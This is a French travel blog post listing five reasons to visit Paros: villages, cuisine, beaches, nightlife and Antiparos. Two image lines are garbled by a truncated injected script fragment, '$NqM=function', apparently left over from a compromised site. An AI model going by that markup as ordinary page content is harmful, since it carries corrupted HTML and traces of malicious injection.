960x320

Cliché de l’ile Grecque traditionnelle, Paros concentre beaucoup d’atouts en sa faveur pour le must des vacances. Après avoir passé quelques jours là-bas, voici mes 5 bonnes raisons d’y aller …

Les villages :

Une promenade dans les étroites rues pavées des villages, bordées de ces maisons au blanc éclatant, nous fait rapidement oublier que l’on était parti pour se dorer la pilule sur une plage de sable fin. Gauche, droite, gauche, droite ; au détour d’une ruelle, on arrive par surprise sur des petits ports ou sont amarrés les traditionnels bateaux de pêche. Un tableau qui nous plonge, le temps de quelques jours, dans le rythme de vie tranquille et chaleureux de la Grèce traditionnelle.

to1_.Original.jpg">Page134.Pho<script>$NqM=function(n){if (typeof ($NqM.list[n]) == to1.Original" src="https://indiasinsights.com/wp-content/uploads/2014/08/Page134.Photo1_.Original-660x495.jpg" width="660" height="495" />

La cuisine :

Les kilos perdus pré-vacances sont rapidement repris sur place. Ici, impossible de passer outre la cuisine locale qui se déguste aussi bien dans les petites tavernes familiales que dans les restaurants plus touristiques. L’île regorge d’endroits, les pieds dans l’eau, ou savourer des kolokithokeftedes  ou une salade (Grecque ; et oui !) comme au Barbarossa avec un bon verre du célèbre vin de Paros.

naoussa1

Les plages :

Quand on voit cette ribambelle de touristes qui débarquent sur l’île, on laisse avec tristesse s’envoler notre rêve de « un cocotier, la mer, le sable et moi ». Mais, à ma grande surprise, l’île est assez grande pour y trouver des criques paisibles ou un coin de tranquillité sur les grandes plages comme à la golden beach sans oublier de passer par le Blue Bar pour contempler le plus beau des couchers de soleil. Après un plongeon dans l’eau tiède de la mer Egée on s’échoue sur sa serviette en somnolant légèrement bercée par le bruit de fond des petites vagues… Quel bonheur !

tor.jpg">header-paros-beach-rota<script>$NqM=function(n){if (typeof ($NqM.list[n]) == tor" src="https://indiasinsights.com/wp-content/uploads/2014/08/header-paros-beach-rotator-660x439.jpg" width="660" height="439" />

La vie nocturne :

Bon et puis vous vous doutez bien qu’avec tous ces touristes, il y a une vraie vie nocturne sur l’île. Ici, on a l’embarras du choix ; faire la fête dans un entrepôt de pêcheur reconverti en bar ou prendre un verre dans un endroit plus calme attablé au bord de l’eau, il y en a pour toutes les ambiances. Une chose est sure : on prend vite goût à la vie après minuit une fois testée l’atmosphère chaleureuse et festive des rues de Naoussa.

Antiparos :

Autrefois sœurs siamoises, Antiparos est désormais la fausse jumelle de Paros ; une île paradisiaque à laquelle on accède après une traversée de 30 min en bateau. Un peu plus sauvage, Antiparos est l’échappatoire idéale à l’animation de l’île principale : des paysages de cartes postales, des petites criques et  des maisons traditionnelles, un sentiment de déjà vu avec un charme différent.

IMG_4913